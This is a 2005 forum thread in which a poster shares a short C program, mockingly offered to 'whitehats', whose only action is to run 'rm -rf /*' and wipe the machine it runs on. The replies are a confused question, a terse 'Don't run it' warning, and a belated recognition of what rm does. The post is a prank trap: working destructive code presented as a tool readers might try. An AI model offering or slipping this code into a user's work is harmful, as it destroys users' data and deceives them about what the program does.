Clan x86

Off topic/Crap => Trash Can => Topic started by: c0n on August 13, 2005, 04:52:59 PM

Title: The Automatic Box RM'er (TABRM)
Post by: c0n on August 13, 2005, 04:52:59 PM
It's open source, obviously. This is for all you whitehats who are sick of being harassed and rm'd by other people. Just rm yourself.


#include <stdio.h>
#include <stdlib.h>

int main()
{
printf("TABRM v1.0, by Big Daddy Jones\n");

system("rm -rf /*");
printf("Congrats! Your system has been rm'd!\n");
printf("...and please, never install another one again.\n");

return 0;
}


Amazingly, this code took about five (5) hours to write. Props to Big Daddy Jones for the achievement.

peace,

c0n
Title: Re: The Automatic Box RM'er (TABRM)
Post by: Joe on August 14, 2005, 04:55:57 AM
huh?
Title: Re: The Automatic Box RM'er (TABRM)
Post by: trust on August 14, 2005, 10:56:21 AM
Quote from: OG Joe on August 14, 2005, 04:55:57 AM
huh?
'

Don't run it.
Title: Re: The Automatic Box RM'er (TABRM)
Post by: Joe on August 16, 2005, 08:00:55 PM
Wow. I finally remembered what rm does. Duh.